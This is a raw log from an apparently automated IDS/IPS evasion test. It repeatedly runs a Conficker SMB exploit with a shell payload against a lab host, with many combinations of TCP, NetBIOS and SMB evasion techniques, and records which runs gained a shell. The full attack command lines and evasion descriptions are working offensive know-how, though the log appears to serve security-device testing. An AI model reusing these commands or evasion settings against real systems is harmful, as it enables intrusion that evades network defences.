- - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.119:31556 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 4813 runs averaging 1.93 runs / second ; progress: 2494/43200.........
- 4822 runs averaging 1.93 runs / second ; progress: 2499/43200........
- 4830 runs averaging 1.93 runs / second ; progress: 2505/43200..................
- 4848 runs averaging 1.93 runs / second ; progress: 2510/43200.........2015-06-08 00:01:22 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55302 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=NCio3MEwTEg --evasion=[smb_connect,msrpc_req]netbios_chaff,"21","empty_unspec|http_get|http_post|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed NCio3MEwTEg
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:55302 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......2015-06-08 00:01:24 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26322 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QWx1nZIe9+M --evasion=[smb_connect,end]tcp_paws,"75%","72312509","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_segvar,"8","65535" --verifydelay=1000 --payload=shell
- Info: Using random seed QWx1nZIe9+N
- The following evasions are applied from stage smb_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72312509> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 8 and 65535 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:26322 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 4868 runs averaging 1.94 runs / second ; progress: 2515/43200........................................
- 4908 runs averaging 1.95 runs / second ; progress: 2520/43200.....
- 4913 runs averaging 1.95 runs / second ; progress: 2525/43200...
- 4916 runs averaging 1.94 runs / second ; progress: 2530/43200Pid 1602 timed out - killed
- 2015-06-08 00:01:40 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34158 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Od53aWgCGO8 --evasion=[smb_openpipe,end]smb_decoytrees,"4","1","3","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Od53aWgCGO8
- The following evasions are applied from stage smb_connect to end:
- - Add a random alphaurgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 1 writes are performed to them. The write payload is 3 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.111:34158 -> 10.35.1.207:445
- Terminated
- ......
- 4923 runs averaging 1.94 runs / second ; progress: 2535/43200................
- 4939 runs averaging 1.94 runs / second ; progress: 2540/43200..................
- 4957 runs averaging 1.95 runs / second ; progress: 2545/43200..........2015-06-08 00:01:57 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56910 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=h1E0rUeQUeg --evasion=[msrpc_bind,end]smb_fnameobf,"change_case|add_paths" --evasion=[start,end]tcp_paws,"75%","6","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"21","268435455","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed h1E0rUeQUei
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alpha bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- Info: NetBIOS connection 10.62.90.115:56910 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 4979 runs averaging 1.95 runs / second ; progress: 2550/43200.................
- 4996 runs averaging 1.96 runs / second ; progress: 2555/43200.........
- 5005 runs averaging 1.96 runs / second ; progress: 2560/43200...............
- 5020 runs averaging 1.96 runs / second ; progress: 2565/43200.......Pid 2406 timed out - killed
- 2015-06-08 00:02:17 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40290 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=AhYHSBXWoXo --evasion=[start,msrpc_bind]tcp_paws,"8","54291791","shuffle30" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed AhYHSBXWoXo
- The following evasions are applied from stage start to msrpc_bind:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 54291791> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:40290 -> 10.35.1.207:445
- Terminated
- .........
- 5037 runs averaging 1.96 runs / second ; progress: 2570/43200........
- 5045 runs averaging 1.96 runs / second ; progress: 2575/43200......
- 5051 runs averaging 1.96 runs / second ; progress: 2580/43200...............
- 5066 runs averaging 1.96 runs / second ; progress: 2585/43200.............
- 5079 runs averaging 1.96 runs / second ; progress: 2590/43200.....
- 5084 runs averaging 1.96 runs / second ; progress: 2595/43200.....
- 5089 runs averaging 1.96 runs / second ; progress: 2600/43200...............
- 5104 runs averaging 1.96 runs / second ; progress: 2605/43200...........
- 5115 runs averaging 1.96 runs / second ; progress: 2610/43200.............2015-06-08 00:03:05 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59465 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=3DS3pyOHWq0 --evasion=[start,msrpc_bind]tcp_chaff,"21","chksum|shorthdr","shuffle" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 3DS3pyOHWq3
- The following evasions are applied from stage start to msrpc_bind:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.115:59465 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 5129 runs averaging 1.96 runs / second ; progress: 2615/43200.......
- 5136 runs averaging 1.96 runs / second ; progress: 2620/43200...
- 5139 runs averaging 1.96 runs / second ; progress: 2625/43200
- 5139 runs averaging 1.95 runs / second ; progress: 2630/43200....
- 5143 runs averaging 1.95 runs / second ; progress: 2635/43200......
- 5149 runs averaging 1.95 runs / second ; progress: 2640/43200....
- 5153 runs averaging 1.95 runs / second ; progress: 2645/43200.......
- 5160 runs averaging 1.95 runs / second ; progress: 2650/43200......
- 5166 runs averaging 1.95 runs / second ; progress: 2655/43200.....
- 5171 runs averaging 1.94 runs / second ; progress: 2660/43200...2015-06-08 00:03:53 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27679 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkY39pBKwKw --evasion=[netbios_connect,end]tcp_paws,"1","121655769","random" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"43643","65533" --verifydelay=1000 --payload=shell
- Info: Using random seed QkY39pBKwKx
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 121655769> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 43643 and 65533 bytes of payload.
- Info: NetBIOS connection 10.62.90.117:27679 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 5184 runs averaging 1.94 runs / second ; progress: 2665/43200......
- 5190 runs averaging 1.94 runs / second ; progress: 2670/43200.......
- 5197 runs averaging 1.94 runs / second ; progress: 2675/43200..........
- 5207 runs averaging 1.94 runs / second ; progress: 2680/43200.......
- 5214 runs averaging 1.94 runs / second ; progress: 2686/43200...........
- 5225 runs averaging 1.94 runs / second ; progress: 2691/43200.........
- 5234 runs averaging 1.94 runs / second ; progress: 2696/43200..........2015-06-08 00:04:30 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38914 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lPX1ueb1MCY --evasion=[msrpc_bind,end]tcp_paws,"75%","8","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"65533","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed lPX1ueb1MCa
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP packets are segmented to contain between 65533 and 65534 bytes of payload.
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:38914 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 5245 runs averaging 1.94 runs / second ; progress: 2701/43200.........Pid 4779 timed out - killed
- 2015-06-08 00:04:34 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31057 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=66asV1b53WY --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"5","inc","zero" --evasion=[smb_connect,smb_openpipe]ipv4_opt,"2","inc","unmodified" --evasion=[netbios_connect,end]tcp_paws,"2","3","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 66asV1b53Wb
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage netbios_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- Info: NetBIOS connection 10.62.90.116:31057 -> 10.35.1.207:445
- Terminated
- .......
- 5262 runs averaging 1.94 runs / second ; progress: 2706/43200................
- 5278 runs averaging 1.95 runs / second ; progress: 2711/43200...........
- 5289 runs averaging 1.95 runs / second ; progress: 2716/43200......
- 5295 runs averaging 1.95 runs / second ; progress: 2721/43200............
- 5307 runs averaging 1.95 runs / second ; progress: 2726/43200.............
- 5320 runs averaging 1.95 runs / second ; progress: 2731/43200...................
- 5339 runs averaging 1.95 runs / second ; progress: 2736/43200...............
- 5354 runs averaging 1.95 runs / second ; progress: 2741/43200Pid 5432 timed out - killed
- 2015-06-08 00:05:11 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38134 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IXFVjUV0NBU --evasion=[start,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|longhdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"1","2","random_alpha" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed IXFVjUV0NBU
- The following evasions are applied from stage start to smb_opentree:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.118:38134 -> 10.35.1.207:445
- Terminated
- ........
- 5363 runs averaging 1.95 runs / second ; progress: 2746/43200.....
- 5368 runs averaging 1.95 runs / second ; progress: 2751/43200.........
- 5377 runs averaging 1.95 runs / second ; progress: 2756/43200........Pid 5835 timed out - killed
- 2015-06-08 00:05:28 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60575 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=gdbOuPqrGXQ --evasion=[msrpc_req,end]smb_decoytrees,"1","6","2","zero" --evasion=[msrpc_req,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed gdbOuPqrGXS
- The following evasions are applied from stage msrpc_req to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- - Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of zeroes.
- Info: NetBIOS connection 10.62.90.114:60575 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Terminated
- ..............
- 5400 runs averaging 1.96 runs / second ; progress: 2761/43200.................
- 5417 runs averaging 1.96 runs / second ; progress: 2766/43200..........2015-06-08 00:05:39 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=L4awF43Jyu8 --evasion=[netbios_connect,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed L4awF43Jyu8
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.117:33189 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 5433 runs averaging 1.96 runs / second ; progress: 2771/43200...Pid 6275 timed out - killed
- .2015-06-08 00:05:44 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18545 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=9j13UKNIujo --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 9j13UKNIujr
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:18545 -> 10.35.1.207:445
- Terminated
- ....
- 5442 runs averaging 1.96 runs / second ; progress: 2776/43200............
- 5454 runs averaging 1.96 runs / second ; progress: 2781/43200..............................
- 5484 runs averaging 1.97 runs / second ; progress: 2786/43200......2015-06-08 00:05:57 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38094 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Ob4ff1j+QiM --evasion=[msrpc_req,end]netbios_chaff,"13","empty_unspec|http_post|broken_length" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","268435455","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed Ob4ff1j+QiM
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.117:38094 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .........2015-06-08 00:05:59 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41416 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=W6ooJoo6NGg --evasion=[smb_opentree,msrpc_bind]smb_chaff,"3","write_flag","rand" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed W6ooJoo6NGh
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.119:41416 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........2015-06-08 00:06:01 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37607 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=dEFeq3VZExs --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1480" --evasion=[smb_openpipe,end]tcp_paws,"75%","86788071","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed dEFeq3VZExt
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 86788071> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:37607 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 5518 runs averaging 1.98 runs / second ; progress: 2791/43200..2015-06-08 00:06:02 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59212 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KcAUp61efmk --evasion=[smb_opentree,end]tcp_chaff,"25%","longhdr","alphanumrandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","9","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KcAUp61efmk
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:59212 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...........................
- 5548 runs averaging 1.98 runs / second ; progress: 2796/43200...........
- 5559 runs averaging 1.98 runs / second ; progress: 2802/43200..............
- 5573 runs averaging 1.99 runs / second ; progress: 2807/43200.2015-06-08 00:06:17 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16184 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=hDX3Ay+q5YA --evasion=[start,msrpc_req]tcp_chaff,"25%","chksum|nullflag|shorthdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"25%","133338995","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed hDX3Ay+q5YC
- The following evasions are applied from stage start to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 133338995> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:16184 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 5589 runs averaging 1.99 runs / second ; progress: 2812/43200..................
- 5607 runs averaging 1.99 runs / second ; progress: 2817/43200...................
- 5626 runs averaging 1.99 runs / second ; progress: 2822/43200..............
- 5640 runs averaging 2.00 runs / second ; progress: 2827/43200.......2015-06-08 00:06:40 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55004 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HTMWhpt4lOI --evasion=[msrpc_bind,end]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed HTMWhpt4lOI
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:55004 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 5651 runs averaging 2.00 runs / second ; progress: 2832/43200.............
- 5664 runs averaging 2.00 runs / second ; progress: 2837/43200...............
- 5679 runs averaging 2.00 runs / second ; progress: 2842/43200..........
- 5689 runs averaging 2.00 runs / second ; progress: 2847/43200.....
- 5694 runs averaging 2.00 runs / second ; progress: 2852/43200............
- 5706 runs averaging 2.00 runs / second ; progress: 2857/43200..........Pid 8518 timed out - killed
- 2015-06-08 00:07:11 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28446 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=F6sYh44LGYY --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed F6sYh44LGYY
- The following evasions are applied from stage start to smb_connect:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:28446 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:07:11 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46988 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Sv3aj7zFtLI --evasion=[netbios_connect,msrpc_req]netbios_chaff,"8","small_unspec" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","52269486","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"25%","205278740","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Sv3aj7zFtLJ
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52269486> and has random alphanumeric bytes as payload
